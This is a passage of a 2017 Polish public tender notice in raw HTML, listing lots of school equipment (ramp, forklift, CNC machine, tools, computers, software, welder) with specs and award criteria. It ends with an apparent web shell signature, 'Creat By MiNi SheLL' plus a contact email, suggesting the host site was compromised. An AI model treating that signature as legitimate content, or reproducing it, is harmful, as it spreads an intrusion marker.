2. Zmiany, o których mowa w ust. 1, nie mogą spowodować zwiększenia całkowitej wartości wynagrodzenia brutto.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/03/2017, godzina: 13:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferta powinna być sporządzona w języku polskim, z zachowaniem formy pisemnej pod rygorem nieważności. Każdy dokument składający się na ofertę powinien być czytelny.<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>zakup wraz z dostawą rampy/szyny podjazdowej szt. 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Szyny podjazdowe z perforowaną powierzchnią i otworami, które zostaną zamontowane w ZSCKU aby w prosty sposób umożliwić osobie na wózku bezpieczny, stabilny podjazd. 
Zakup niezbędny do dostosowania szkoły do potrzeb osób niepełnosprawnych.

Szyny podjazdowe z perforowaną powierzchnią z otworami w celu odprowadzania zanieczyszczeń.

DANE TECHNICZNE:
Długość min-max: 116-290 cm
Szerokość: 17 cm
Wysokość: 5 cm
Waga szyny: 8,8 kg
Max. obciążenie pary: 270 kg
Rekomendowana różnica wysokości 65 cm<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33196200-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 7<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>zakup wraz z dostawą wózka widłowego spalinowego szt. 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Specyfikacja - minimalne wymogi: 
- Udźwig nominalny: 2 500kg., 
- Maszt: Duplex, 
- Wysokość podnoszenia: 4000 mm, 
- Zasilanie: benzyna/LPG, 
- Skrzynia biegów: automatyczna, 
- Widły: 920 mm, 
- Opony: pneumatyczne
- Przesuw boczny wideł
- Pełne oświetlenie drogowe
- Amortyzowana kabina operatora
- Wygodny, profilowany i regulowany fotel operatora
- Ergonomiczne położenie dźwigni sterowniczych przyspiesza obsługę i redukuje zmęczenie operatora
- Zamontowane światło ostrzegawcze 
- Załączony zestaw kluczy podstawowy
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>42415000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 7<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>zakup wraz z dostawą:<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Szlifierka kątowa kpl. 1
Wymagania minimalne:
Średnica tarczy: 230 mm
Typ zasilania: elektryczne
Moc:  min 2400 W
Max prędkość obrotowa: min. 6500 rpm
Masa: max 6,5 kg
Łagodny rozruch
Klucz oczkowy
Kołnierz mocujący
Nakrętka mocująca
Osłona z systemem szybkiego przestawiania
Rękojeść dodatkowa z systemem Vibration Control
Wymagania minimalne:
Średnica tarczy: 230 mm
Typ zasilania: elektryczne
Moc:  min 2400 W
Max prędkość obrotowa: min. 6500 rpm
Masa:  max 6,5 kg
Łagodny rozruch
Klucz oczkowy
Kołnierz mocujący
Nakrętka mocująca
Osłona z systemem szybkiego przestawiania
Rękojeść dodatkowa z systemem Vibration Control

2.Obrabiarka CNC  zestaw szt. 1
Obszar roboczy: 
Zakres ruchu w osiach: X/Y/Z [mm] 190/140/260
Posuw w osiach: X/Y/Z 2m/min
Wymiary stołu: (LxW) [mm] 420x125
Wrzeciono:
Moc wrzeciona: 0,75 kW 
Prędkość: 150-4000 obr/min (opcjonalnie 14000 obr/min) 
Magazyn narzędziowy: 8 narzędzi
3.Oprogramowanie MTS licencja szt. 1,
Oprogramowanie dydaktyczno-przemysłowe do uczenia się programowania i do programowania obrabiarek sterowanych numerycznie CNC w zakresie toczenia i frezowania.
4.Pneumatyka zestaw szt. 1
W skład stanowisk praktycznych wchodzi: - stół z płytą profilową - 2 szt., - szafka na komponenty - 4 szt., - TP101 - 4 szt., - TP102 - 4 szt., - TP201 - 4 szt., - TP1311 - 4 szt., - moduł rozszerzający - 4 szt., - zasilacz 24V - 4 szt., - zestaw przewodów - 4 szt., - FluidSIM 5 P - 5 licencji, - kompresor.
5.Zestaw narzędzi kluczy oczkowych kpl 4
12-kątna główka oczkowa, wygięta o 15°; 10 elementów: 6 x 7 - 8 x 9 - 10 x 11 - 12 x 13 - 14 x 15 - 16 x 17 - 18 x 19 - 20 x 22 - 24 x 27 - 30 x 32 mm; Długość: 178, 195, 200, 220, 235, 250, 285, 300, 330, 360 mm

6.Zestaw narzędzi kluczy płaskich kpl 4
położenie główki 150; Chrom-wanad-stal, chromowane, polerowane na wysoki połysk; Stal chromowo-wanadowa, chromowana, satynowana; 12-elem. 6 x 7 - 8 x 9 - 10 x 11 - 12 x 13 - 14 x 15 -16 x 17 - 18 x 19 - 20 x 22 - 21 x 23 - 24 x 27 - 25 x 28 - 30 x 32 mm; Długość: 125, 142, 157, 175, 188, 205, 222, 233, 249, 266, 282, 305 mm. 

7.Zestaw narzędzi kluczy trzpieniowych kpl 4
Trzon: chromowo-wanadowa stal wysokogatunkowa, całościowo hartowana, fosforowana manganem; Normy: w oparciu o ISO 2936L; Końcówka kulista umożliwia pracę pod kątem do 25°; Zestawy 9 sztukowe - 1,5; 2; 2,5; 3; 4; 5; 6; 8; 10; Klucze torx; Zestaw 9 elementowy; Rozmiar: TT10, TT15, TT20, TT25, TT27, TT30, TT40, TT45, TT50. 

8.Suwmiarka noniuszowa zestaw szt. 4
Zestaw dwóch suwmiarek z głębokościomierzem z noniuszami na dole 0,05 mm i 0,02 mm; prowadnica i suwak z hartowanej, nierdzewnej stali; możliwość pomiarów wewnętrznych i zewnętrznych; Podziałka i noniusz matowo chromowane z przyciskiem do odblokowania suwaka; Zwiększona długość prowadnic; Zakres pomiarowy 0150 mm; Tabela gwintów na tylnej stronie; Długość szczęk min. 40 mm. 

9.Suwmiarka z odczytem elektronicznym szt. 4
Nierdzewna, prowadnica, szczęki i ostrza hartowane; śrubą ustalającą na górze; Szczęki do pomiarów zewnętrznych i wewnętrznych zaostrzone do mierzenia małych rowków i otworów; okrągły głębokościomierz; indukcyjny system pomiaru z funkcją oszczędzania energii; Bardzo dobre własności ślizgowe suwaka z pojemnościowym układem pomiarowym, ze zgarniaczem zanieczyszczeń; Z wyjściem do przesyłania danych; Wyraźny wyświetlacz LCD z cyframi o wysokości min. 11 mm; Odczyt 0,01 mm/0,0005 cala; zakres pomiarowy 0-150 mm; długość szczęk 40 mm; tabela gwintów na tylnej stronie; Przełącznik mm/cale; Dostawa w etui włącznie z baterią. 

10.Lampa stanowiskowa szt. 4
Lampy stanowiskowe bezpieczne diodowe lub świetlówkowe.


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>43414000-8, 42600000-2,
                    42600000-2,
                    44510000-8,
                    42650000-7,
                    44512500-7,
                    38552000-9,
                    31500000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 7<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>zakup wraz z dostawą:<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Komputer stacjonarny z systemem operacyjnym szt. 2,
Komputer klasy PC z 2 letnią gwarancją (procesor czterordzeniowy o częstotliwości min. 3 GHz, min. 4 GB RAM, dysk twardy min. 500 GB SATA, napęd optyczny DVD +/- RW, karta sieciowa 100/1000 Mbps, karta grafiki, mysz, klawiatura), monitor LED 24 (rozdzielczość 1920 x 1080 pikseli, czas reakcji matrycy 5 ms, jasność 250 cd/m2, format panoramiczny, typ sygnału wejściowego D-Sub, HDMI), system operacyjny min. Win 10 Professional 64 bit, program antywirusowy na każde stanowisko. 
2.Komputer z oprogramowaniem biurowym szt. 1,
Komputer markowy, klasy PC wyprodukowany przez jednego producenta z 3 letnią gwarancją, Procesor min. dwurdzeniowy o częstotliwości min. 2,5 GHz, min. 4 GB RAM, dysk twardy min. 320 GB, napęd optyczny DVD +/- RW, karta sieciowa, karta grafiki zintegrowana, mysz, klawiatura, kamera internetowa,  monitor LED 24, rozdzielczość 1920 x 1080 pikseli, czas reakcji matrycy 5 ms, jasność 250 cd/m2, format panoramiczny, typ sygnału wejściowego D-Sub, HDMI,  system operacyjny min. Win 10 Professional 64 bit,  pakiet biurowy (edytor tekstu, arkusz kalkulacyjny, program do tworzenia prezentacji na każde stanowisko),  program antywirusowy na każde stanowisko.
3.Oprogramowanie do projektowania terenów zieleni szt. 1
Wymagania do programu:
Program powinien posiadać dwa tryby pracy: tryb 2D który służy do aranżacji ogrodu i rozmieszania elementów oraz tryb 3D w którym mamy podgląd na wizualizację projektowanego ogrodu, oraz:
Przyciąganie do punktów siatki;
Przyciąganie do obiektów i linii pomocniczych;
Pionowe, poziome i dwupunktowe linie pomocnicze umożliwiające precyzyjne wstawianie elementów;
Wymiarowanie - umożliwia zwymiarowanie dowolnych składowych projektu;
Ulepszona funkcja modelowanie terenu - możliwość wstawiania płaskowyżu (wzniesienie o bokach na jednakowej wysokości);
Możliwość obsadzenia grządki różnymi gatunkami roślin;
Możliwość grupowania i rozgrupowania obiektów - w przeciwieństwie do multiselekcji obiekty są zgrupowane do momentu, kiedy użytkownik ich nie rozgrupuje (nawet po zamknięciu i ponownym otworzeniu projektu);
Możliwość ustalania kolejności wyświetlania obiektów - w tle, na pierwszym planie;
Efekt Mgły - możliwość określania widoczności (zasięgu) i koloru mgły;
Wybór tekstur nieba;
Możliwość wstawiania krajobrazu i zmiany jego tekstury oraz właściwość analogicznie do zmiany właściwości obiektów;
Folie - wczytywanie planów w postaci plików bmp;
Możliwość wstawiania zdjęć .bmp;
Wprowadzenie funkcji Widok Dzień/Noc;
Lampy - dodanie światła - możliwość określania koloru i intensywności;
Możliwość ukrywania obiektów podczas pracy w trybie projektowanie (2D);
Zmiana tekstury podłoża, grządki i wody analogicznie do pory roku;
Rozszerzona biblioteka obiektów;
Ulepszona funkcja drukowania;
Możliwość wydruku linii pomocniczych i wymiarowych;
Tryb projektowy 2D powinien posiadać min. następujące cechy:
maksymalna wielkość działki 1000x1000m;
dowolne kształtowanie terenu działki w edytorze wysokości (rzeźba terenu) - możliwość robienia depresji;
możliwość wstawiania: płotu, muru, żywopłotu - różne tekstury, dowolne określanie wysokości i szerokości;
wstawianie pojedynczych roślin, grządek, czy rzędów roślin z bazy danych zawierającej ponad 7000 roślin;
szczegółowy opis znajdujących się w bazie roślin (kraj pochodzenia, wielkość, strefa klimatyczna, kolor liści i kwiatów, wilgotność podłoża, mrozoodporność, itp.);
wyszukiwanie roślin według prawie wszystkich kryteriów z bazy danych;
biblioteka obiektów zawierająca: ponad 150 przykładowych domów i ponad 350 obiektów ogrodowych tj.:, meble ogrodowe, akcesoria ogrodowe, stawy, oczka, wodne, baseny, itp;
edycja gabarytów obiektów;
drukowanie projektu 2D;
import obiektów VRML z programu ArCon+;
animacja wzrostu roślin;
okno podglądu 3D w trybie projektowania;
animacja wzrostu roślin;
grupowanie obiektów z możliwością ich przesuwania, kasowania, klonowania;
ustawianie kamery w trybie projektowania;
wydruk planu i listy ze wstawionymi do projektu roślinami - możliwość wyboru polskich i łacińskich nazw roślin;
nowe tekstury o wyższej rozdzielczości do ponad 1000 roślin;
lokalny i globalny układ współrzędnych;
Tryb podglądu 3D powinien posiadać następujące możliwości:
wizualizacja projektu w 3D;
wirtualny spacer;
różne ujęcia kamery, widok z pozycji obserwatora;
wyświetlanie siatki terenu;
wybór tekstur terenu;
animowane niebo;C10
animacja wzrostu roślin;
prezentacja ponad 1000 roślin w różnych porach roku.
4.Oprogramowanie do wykonywania rysunków technicznych na 16 stanowisk szt. 1
Program do wykonywania rysunków technicznych, eksportowanie rysunków do formatów JPG i PDF
Program powinien umożliwić:
- tworzenie projektów dwuwymiarowych, trójwymiarowych, a także w widoku aksonometrycznym i perspektywicznym
- obsługa rozmaitych jednostek długości,
- rozbudowana konfiguracja druku (skalowanie, optymalizacje),
- włączanie/wyłączanie widoczności warstw,
- publikacja do formatu PDF. DWG
- przeglądanie różnych widoków zawartych w projekcie,
- obracanie,
- odbicie lustrzane,
- kopiowanie,
- wyświetlanie podglądu w trybie kolorowym
- możliwość ustawienia koloru tła,
- wczytywanie podkłady rastrowe w formatach BMP, JPG, TIF i PNG
- wymiarowanie liniowe i kątowe z zapisem stylów
- praca na warstwach.
5.Drukarka laserowa ze skanerem i kopiarką szt. 1
Drukarka spełnia minimalne wymogi:  urządzenie wielofunkcyjne laserowe monochromatyczne,  funkcje: drukowanie, skanowanie, kopiowanie,  druk 20 str./min, rozdzielczość druku min. 1200/600 dpi, pamięć min. 16 MB, złącze USB,  skanowanie w rozdzielczości 600x600 dpi w kolorze, - format wydruku A3 i A4.
6.Urządzenie wielofunkcyjne (drukarka laserowa ze skanerem i kopiarka A4) szt. 1
Urządzenie wielofunkcyjne laserowe monochromatyczne, funkcje: drukowanie, skanowanie, kopiowanie, druk 20 str./min, rozdzielczość druku min. 1200/600 dpi, pamięć min. 16 MB, złącze USB, skanowanie w rozdzielczości 600x600 dpi w kolorze.
7.Ploter szt. 1
Ploter spełnia minimalne wymogi:nośniki - papier samoprzylepny (samoprzylepny, polipropylen) | folia (przezroczysta, matowa) | papier fotograficzny (satynowy, błyszczący, półbłyszczący, premium, polipropylen) | papier techniczny (typowa kalka kreślarska, kalka techniczna) | papier typu bond i powlekany (bond, powlekany, papier powlekany o dużej gramaturze, ekologiczny, zwykły, śnieżnobiały)
  szerokość nośnika/foli w zakresie 50-610 mm;  szerokość cięcia min: 290 mm,  podawanie folii z rolki i w arkuszach;  nóż wleczony o nacisku ok. 400 g;  bufor pamięci 1-4 MB;  złącza: WiFi, USB 2.0, RS232, Centronics;  Fast Ethernet gwarancja: min. 24 miesiące.
8.Projektor multimedialny szt. 1
Projektor multimedialny spełnia minimalne wymogi:  rozdzielczość optyczna min. 1024x768,  jasność min. 2200 ANSI Lumenów (w trybie eco min. 1600 ANSI Lumenów),  kontrast min. 4000:1,  format obrazu (standard) 4:3,  żywotność lampy min. 5000 h  tryb normalnej pracy,  porty/złącza wejścia/wyjścia: D-Sub, RCA (video), S-Video, HDMI, stereo mini Jack,  wbudowany głośnik o mocy min. 5 W (stereo),  torba na projektor i dołączony fabrycznie kabel zasilający i sygnałowy RGB oraz przewód HDMI,  wskaźnik laserowy, pilot,  technologia  LCD,  wraz z ekranem: rozwijany elektrycznie, powierzchnia projekcyjna: matowa, biała, rozmiar powierzchni projekcyjnej: szerokość: min. 180 cm, wysokość: min. 135 cm, format: 4:3 lub 16:9, sterowanie: ręczne lub bezprzewodowe, mocowanie: ścienne lub sufitowe.
9.Projektor multimedialny wraz z ekranem szt. 2
Rozdzielczość optyczna min. 1024x768, jasność min. 2200 ANSI Lumenów (w trybie eco min. 1600 ANSI Lumenów), kontrast min. 4000:1, format obrazu (standard) 4:3, żywotność lampy min. 5000 h  tryb normalnej pracy, porty/złącza wejścia/wyjścia: D-Sub, RCA (video), S-Video, HDMI, stereo mini Jack, wbudowany głośnik o mocy min. 5 W (stereo), torba na projektor i dołączony fabrycznie kabel zasilający i sygnałowy RGB oraz przewód HDMI, wskaźnik laserowy, pilot, technologia  LCD, wraz z ekranem: rozwijany elektrycznie, powierzchnia projekcyjna: matowa, biała, rozmiar powierzchni projekcyjnej: szerokość: min. 180 cm, wysokość: min. 135 cm, format: 4:3 lub 16:9, sterowanie: ręczne lub bezprzewodowe, mocowanie: ścienne lub sufitowe. 
10.Tablica flipchart szt. 4
Wymogi: na kółkach z regulacją wysokości, półką na markery, do papierowych Euro bloków 70x100 cm.
11.Tablica szkolna, biała suchościeralna szt. 4
Powierzchnia biała suchościeralna, magnetyczna o wymiarach co najmniej 240 x 120 cm z półką na flamaster.
12.Modele brył geometrycznych kpl 3
Modele: kuli, graniastosłupów, ostrosłupów z możliwością demontażu według płaszczyzn podziału, wykonane z tworzywa sztucznego w jasnym kolorze.
13.Stolik kreślarski szt. 15
Stolik kreślarski musi spełniać minimalne wymogi: Podstawa stolika umożliwiająca zamontowanie rysownicy kreślarskiej. Rysownica kreślarska wyposażona w regulację umożliwiającą 5 kątowe położenie w zakresie 0 -60 stopni. Rysownica o powierzchni mieszczący format A2.
14.Krzesła obrotowe szt. 15
Krzesło obrotowe musi spełniać minimalne wymogi: Posiadające regulację wysokości siedziska oraz regulację kąta oparcia.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>48151000-1, 48000000-8,
                    30232100-5,
                    30232110-8,
                    38652100-1,
                    30195400-6,
                    39162100-6,
                    39113500-2,
                    39112000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 7<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>czas dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>zakup wraz z dostawą:<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Spawarka TIG kpl 1
Urządzenie spawalnicze TIG AC AC posiadające parametry:
Nastanie prądu: 0 - 10 sec 
Opadanie prądu: 0 - 10 sec 
Powypływ gazu: 0 - 25 sec 
Przedwypływ gazu: 0 - 5 sec 
Przewód zasilający: 3 x 2.5 
Narastanie prądu: 0 - 9.9 sec 
Opadanie prądu: 0 - 10 sec 
Powypływ gazu: 0 - 25 sec 
Przedwypływ gazu: 0 - 5 sec 
Przewód zasilający: 3 x 2.5 

Dane techniczne zasilania
Balans AC: 50-98 % 
Niskie napięcie DC stanu jałowego: 46 V 
Stopień ochrony: IP 23 
Współczynnik mocy przy prądzie maksymalnym: 0.99 % 
Wysokie napięcie DC stanu jałowego: 60/&lt;35 V 
Zakres nastaw MMA/DC: 4-160 A 
Zakres nastaw TIG/DC: 3-220 A 
Balans AC: 70 % 
Masa: do15 kg 
Wskaźnik sprawności
Sprawność przy maksymalnym natężeniu prądu: 66 % 

Właściwości
Kompaktowe i przenośne urządzenie inwertorowe do spawania metodą TIG z użyciem prądu stałego i przemiennego, z funkcją zajarzania łuku poprzez układ HF lub LiftArc oraz możliwością spawania metodą MMA.  Urządzenie bardzo wytrzymałe i odporne na uderzenia.
Łatwe w obsłudze
Cyfrowy wyświetlacz umożliwiający nastawę parametrów spawania
Spawanie pulsacyjne metodą TIG z użyciem prądu stałego zapewniające większą kontrolę nad przekazywaną ilością ciepła oraz parametrami jeziorka
Dwie pamięci do przechowywania ustawień
Funkcja która  minimalizuje strefę wpływu ciepła szczególnie w przypadku cienkich materiałów
Nastawne wartości narastania i opadania prądu oraz wypływu gazu po spawaniu 
Możliwość zdalnego sterowania
Regulator zapewniający lepszą charakterystykę spawania metodą MMA. Wyższa jakość spoiny nie wymaga dużego procesu obróbki.
Wszystkie rodzaje materiału, w tym aluminium, oraz maksymalna grubość 5 mm.
wbudowany obwód korekty współczynnika mocy 
Stopień ochrony IP 23 pozwala na eksploatację urządzenia na zewnątrz i bezpieczne wykorzystywanie we wszystkich warunkach.

Wyposażone w uchwyt spawalniczy o długości do 5 mb posiadający parametry dedykowany do urządzenia:
Wyprodukowane z zastosowaniem odpornej na wysokie temperatury izolacji z kauczuku silikonowego 
Elementy wykonane całkowicie z miedzi zapewniają niższe temperatury robocze i maksymalną wydajność prądową 
Połączenie sworzniowe 
Efektywne chłodzenie 
Przełącznik spustowy umieszczony jest w pozycji neutralnej dla palca 
Elastyczna głowica 
Spawarka wyposażona w przyłbicę samościemniającą umożliwiającą regulację ściemnienia w zakresie 9-13<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>42662000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 7<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com